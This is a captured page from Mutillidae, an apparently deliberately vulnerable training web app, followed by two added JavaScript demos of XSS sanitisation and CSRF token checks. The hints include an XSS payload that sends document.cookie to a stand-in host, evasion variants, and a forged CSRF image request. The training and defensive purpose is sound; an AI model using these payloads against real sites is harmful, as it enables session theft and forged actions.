Mutillidae: Born to be Hacked
Version: 2.1.19 (Not Logged In)

Site hacked...err...quality-tested with Samurai WTF, Backtrack, Firefox, Burp-Suite, Netcat, and these Mozilla Add-ons
Developed by Adrian "Irongeek" Crenshaw and Jeremy Druin
Welcome To The Blog
Add New Blog Entry
View Blogs
Add blog for anonymous
Note: <b>,</b>,<i>,</i>,<u> and </u> are now allowed in blog entries
 
Error: Failure is always an option and this situation proves it
Line: 285
Code: 0
File: /var/www/mutillidae/add-to-your-blog.php
Message: Error: Table 'metasploit.blogs_table' doesn't exist
Trace: #0 /var/www/mutillidae/index.php(469): include() #1 {main}
Diagnostic Information: SELECT * FROM blogs_table WHERE blogger_name like 'anonymous%' ORDER BY date DESC LIMIT 0 , 100
Did you setup/reset the DB?
 
 
 
CSRF Protection Information
Posted Token:
Expected Token For This Request:
Token Passed By User For This Request:
 
New Token For Next Request: 5323
Token Stored in Session: 5323
Hints
  • For XSS: XSS is easy stuff. This one shows off both reflected (you see the results instantly) and stored (someone can run across it later in another app that uses the same database). "<script>alert("XSS");</script>" is the classic, but there are far more interesting things you could do which I plan to show in a video later.
  • For some hot cookie stealing action, try something like: <script> new Image().src="http://some-ip/mutillidae/catch.php?cookie="+encodeURI(document.cookie); </script>
  • Check out RSnake's XSS Cheat Sheet for more ways you can encode XSS attacks that may allow you to get around some filters.
  • For CSRF: You can create another page someplace and make a link to an image that is not an image. You can also send someone an HTML email with a link inside. Sending links over HTML-aware Instant Messaging like Communicator also works. One of the quietest methods is to use HTML injection to poison a web page, thus creating a persistent attack. When a user visits the poisoned page, their browser will reach out to the target page. Using an AJAX request can keep the rogue transaction silent. You could use something like the following:
    <img src="http://localhost/mutillidae/index.php?page=add-to-your-blog.php&input_from_form=hi%20there%20monkeyboy">
    This is the easy way to do CSRF with the GET method. Login as someone, make your page with the link image someplace else, and then view it. You should now see something new on the comment wall.
  • For Cross Site Request Forgery, a tool like the Social-Engineer Toolkit (SET) by Dave Kennedy can help.
  • One interesting concept is injecting server-side code. Talk about ownage. This requires very special circumstances though. Essentially you need the concept of "eval()" happening on the server side. In Oracle and SQL Server this command is "EXEC". In JavaScript the command is "eval()". In PHP and ASP look for "include()". In ColdFusion the tag fulfills this purpose. Eval() is the opposite of encoding. It takes a text context and transforms text into an execution context. Encoding takes potentially dangerous code that could execute and renders it harmless.
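The blog page says <b>, <i> and <u> are now allowed in entries, and the XSS hints list the classic payload, the cookie-stealing payload and RSnake's filter-evasion variants. The following is an added example written for this page, not Mutillidae's own code: it contrasts a naive "strip <script>" filter with the safe way to allow a handful of tags, which is to HTML-encode everything and then re-enable only the six exact literal tags. The sample inputs are constructed; the `looksExecutable` check is a deliberately crude heuristic for the demo, not a parser.

```javascript
'use strict';

// Step 1: HTML-encode every character that can open a tag, attribute or entity.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// The six literals the blog note says are allowed. Exact strings only.
const ALLOWED_TAGS = ['<b>', '</b>', '<i>', '</i>', '<u>', '</u>'];

// Step 2: after encoding, turn the encoded form of each allowed literal back
// into the real tag. "<B>" or "<b onmouseover=...>" never match the encoded
// literal, so they stay as inert text.
function sanitizeBlogEntry(entry) {
  let out = escapeHtml(entry);
  for (const tag of ALLOWED_TAGS) {
    out = out.split(escapeHtml(tag)).join(tag);
  }
  return out;
}

// The kind of denylist filter the cheat sheet is written to bypass:
// remove the literal lowercase <script> and </script> and nothing else.
function naiveStripScript(entry) {
  return String(entry).replace(/<\/?script>/g, '');
}

// Crude heuristic for the demo: any tag other than b/i/u, any on*= attribute,
// or a javascript: URL counts as something a browser could execute.
function looksExecutable(html) {
  const tagRe = /<\s*\/?\s*([a-z0-9]+)([^>]*)>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const name = m[1].toLowerCase();
    const attrs = m[2];
    if (!['b', 'i', 'u'].includes(name)) return true;
    if (/\son\w+\s*=/i.test(attrs) || /javascript:/i.test(attrs)) return true;
  }
  return false;
}

// Constructed sample entries: the two payloads from the hints, two evasion
// variants, and two entries that use the allowed <b> tag.
const SAMPLES = {
  classic: '<script>alert("XSS");</script>',
  cookie: '<script> new Image().src="http://some-ip/mutillidae/catch.php?cookie="+encodeURI(document.cookie); </script>',
  mixedCase: '<ScRiPt>alert(1)</ScRiPt>',
  imgOnerror: '<img src=x onerror=alert(1)>',
  allowedBold: 'hi there <b>monkeyboy</b>',
  boldWithHandler: '<b onmouseover=alert(1)>x</b>',
};

// Run both filters over every sample and report whether anything executable survives.
function evaluate() {
  const report = {};
  for (const [name, input] of Object.entries(SAMPLES)) {
    report[name] = {
      naiveStillExecutable: looksExecutable(naiveStripScript(input)),
      allowlistStillExecutable: looksExecutable(sanitizeBlogEntry(input)),
      allowlistOutput: sanitizeBlogEntry(input),
    };
  }
  return report;
}

console.table(evaluate());
```

The naive filter happens to neutralise the two lowercase payloads from the hints, but lets `<ScRiPt>` and `<img onerror>` straight through; the encode-then-allow version leaves `<b>monkeyboy</b>` intact and renders every other sample as harmless text, including the `<b onmouseover=...>` attempt to smuggle a handler into an allowed tag.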
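The CSRF Protection Information block above prints a token stored in the session (5323), the token the user passed, and a new token for the next request, and the CSRF hint shows the forged request as an `<img>` fetch of `index.php?page=add-to-your-blog.php&input_from_form=...`. The following Node.js example is added here and is not Mutillidae's code: it models that synchronizer-token check around a stand-in blog handler, shows why the forged GET fails once the check is on, and compares a 4-digit token space with a 128-bit one. How Mutillidae actually generates its token is not shown on this page and is not assumed; the handler, session shape and request shape are constructed for the demo.

```javascript
'use strict';
const crypto = require('crypto');

// Weak: a 4-digit number of the same size as the 5323 on this page.
// Only the size of the space matters here (10^4 values); the RNG is not the problem.
function makeWeakToken() {
  return String(crypto.randomInt(0, 10000));
}

// Strong: 128 bits from the CSPRNG, hex encoded (32 characters).
function makeStrongToken() {
  return crypto.randomBytes(16).toString('hex');
}

// Constant-time comparison. Both sides must be strings of equal length.
function tokensMatch(expected, posted) {
  if (typeof expected !== 'string' || typeof posted !== 'string') return false;
  const a = Buffer.from(expected);
  const b = Buffer.from(posted);
  if (a.length !== b.length) return false;
  return crypto.timingSafeEqual(a, b);
}

// Stand-in for add-to-your-blog.php. A session is { user, csrfToken, blog },
// a request is { method, params }. With requireToken on, only a POST that
// carries the session's current token is accepted; the token is rotated
// after every attempt so a captured value is single-use.
function addToBlog(session, request, { requireToken, makeToken }) {
  const posted = request.params.csrf_token;
  if (requireToken && (request.method !== 'POST' || !tokensMatch(session.csrfToken, posted))) {
    session.csrfToken = makeToken();
    return { ok: false, reason: 'csrf token missing or wrong' };
  }
  session.blog.push({ blogger: session.user, text: request.params.input_from_form });
  session.csrfToken = makeToken();
  return { ok: true, entries: session.blog.length };
}

// The forged request from the hint: the victim's browser fetches
// <img src="http://localhost/mutillidae/index.php?page=add-to-your-blog.php&input_from_form=hi%20there%20monkeyboy">
// It carries the victim's session cookie, but it is a GET and carries no token.
const forgedRequest = { method: 'GET', params: { input_from_form: 'hi there monkeyboy' } };

function newSession() {
  return { user: 'anonymous', csrfToken: makeStrongToken(), blog: [] };
}

// No token check: the forgery lands on the comment wall.
function demoNoCheck() {
  return addToBlog(newSession(), forgedRequest, { requireToken: false, makeToken: makeStrongToken });
}

// Token check on: the same forgery is rejected.
function demoWithCheck() {
  return addToBlog(newSession(), forgedRequest, { requireToken: true, makeToken: makeStrongToken });
}

// A legitimate post: the form echoes back the token the server issued, and the
// server issues a fresh one afterwards.
function demoLegitimate() {
  const session = newSession();
  const before = session.csrfToken;
  const req = { method: 'POST', params: { input_from_form: 'hello', csrf_token: before } };
  const result = addToBlog(session, req, { requireToken: true, makeToken: makeStrongToken });
  return { ok: result.ok, rotated: session.csrfToken !== before };
}

// How many guesses a 4-digit token survives against an attacker page that
// simply embeds one request per candidate value. Never more than 10^4.
function guessesToHit(weakToken) {
  for (let i = 0; i < 10000; i++) {
    if (tokensMatch(weakToken, String(i))) return i + 1;
  }
  return Infinity;
}

console.log('no check:', demoNoCheck());
console.log('with check:', demoWithCheck());
console.log('legitimate:', demoLegitimate());
console.log('guesses for a 4-digit token:', guessesToHit(makeWeakToken()));
```

A 4-digit token bounds the attacker at ten thousand forged requests, which a single hidden page can issue; a 128-bit token makes guessing irrelevant, and rotating it after each request means even a leaked value (for instance through the cookie-stealing XSS above) buys only one forged post.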